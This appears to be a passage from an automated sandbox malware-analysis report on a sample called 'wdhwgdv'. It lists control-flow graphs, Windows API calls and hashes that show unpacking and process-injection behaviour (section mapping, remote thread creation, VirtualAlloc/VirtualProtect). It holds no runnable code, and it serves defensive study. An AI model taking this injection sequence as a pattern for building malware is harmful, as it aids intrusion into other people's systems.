                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                                • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                                • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 61003c-610047 1 610049 0->1 2 61004c-610263 call 610a3f call 610e0f call 610d90 VirtualAlloc 0->2 1->2 17 610265-610289 call 610a69 2->17 18 61028b-610292 2->18 22 6102ce-6103c2 VirtualProtect call 610cce call 610ce7 17->22 19 6102a1-6102b0 18->19 21 6102b2-6102cc 19->21 19->22 21->19 29 6103d1-6103e0 22->29 30 6103e2-610437 call 610ce7 29->30 31 610439-6104b8 VirtualFree 29->31 30->29 33 6105f4-6105fe 31->33 34 6104be-6104cd 31->34 36 610604-61060d 33->36 37 61077f-610789 33->37 35 6104d3-6104dd 34->35 35->33 39 6104e3-610505 35->39 36->37 42 610613-610637 36->42 40 6107a6-6107b0 37->40 41 61078b-6107a3 37->41 51 610517-610520 39->51 52 610507-610515 39->52 44 6107b6-6107cb 40->44 45 61086e-6108be LoadLibraryA 40->45 41->40 46 61063e-610648 42->46 48 6107d2-6107d5 44->48 50 6108c7-6108f9 45->50 46->37 49 61064e-61065a 46->49 53 610824-610833 48->53 54 6107d7-6107e0 48->54 49->37 55 610660-61066a 49->55 56 610902-61091d 50->56 57 6108fb-610901 50->57 58 610526-610547 51->58 52->58 62 610839-61083c 53->62 59 6107e2 54->59 60 6107e4-610822 54->60 61 61067a-610689 55->61 57->56 63 61054d-610550 58->63 59->53 60->48 64 610750-61077a 61->64 65 61068f-6106b2 61->65 62->45 66 61083e-610847 62->66 68 6105e0-6105ef 63->68 69 610556-61056b 63->69 64->46 70 6106b4-6106ed 65->70 71 6106ef-6106fc 65->71 72 610849 66->72 73 61084b-61086c 66->73 68->35 74 61056d 69->74 75 61056f-61057a 69->75 70->71 76 61074b 71->76 77 6106fe-610748 71->77 72->45 73->62 74->68 79 61059b-6105bb 75->79 80 61057c-610599 75->80 76->61 77->76 84 6105bd-6105db 79->84 80->84 84->63
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0061024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991754480.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_610000_wdhwgdv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: b40402b49297019ac0359b46df886006c9cefe6b746cbecd0bbf5e598aecbc36
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 24526874A012299FDB64CF68C985BA8BBB1BF09304F1480D9E54DAB351DB70AAC5DF14

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 5f1d11-5f1d2a 229 5f1d2c-5f1d2e 228->229 230 5f1d35-5f1d41 CreateToolhelp32Snapshot 229->230 231 5f1d30 229->231 232 5f1d43-5f1d49 230->232 233 5f1d51-5f1d5e Module32First 230->233 231->230 232->233 240 5f1d4b-5f1d4f 232->240 234 5f1d67-5f1d6f 233->234 235 5f1d60-5f1d61 call 5f19d0 233->235 238 5f1d66 235->238 238->234 240->229 240->233
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005F1D39
                                                • Module32First.KERNEL32(00000000,00000224), ref: 005F1D59
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991730217.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_5e0000_wdhwgdv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 44580da363863889bea03da6498623c214c6daeec924467c3293b3f81987090b
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: 2FF0F631100B19ABD7203BF9A88CB7E7AFCBF49360F100528E742D10C0DBB4EC054AA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 241 610e0f-610e24 SetErrorMode * 2 242 610e26 241->242 243 610e2b-610e2c 241->243 242->243
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,00610223,?,?), ref: 00610E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,00610223,?,?), ref: 00610E1E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991754480.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_610000_wdhwgdv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: 649faff877baa90af5d0f76c5993c87f03ba0bdede3cca897dfd7d7f314a1141
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: FFD0123114512877DB002A95DC09BCD7B1CDF05B62F048411FB0DD9180C7B0998046E5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                                • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                                • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                                • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                                • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                                • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                                • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 408 5f19d0-5f1a0a call 5f1ce3 411 5f1a0c-5f1a3f VirtualAlloc call 5f1a5d 408->411 412 5f1a58 408->412 414 5f1a44-5f1a56 411->414 412->412 414->412
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005F1A21
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991730217.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_5e0000_wdhwgdv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 87df61f7c197d91c82fbfcb672768affd64ec3ee4472fa334c13c3eb7805380f
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: 13112B79A40208EFDB01DF98C989E98BFF5AF08351F058094FA489B362D375EA50DF84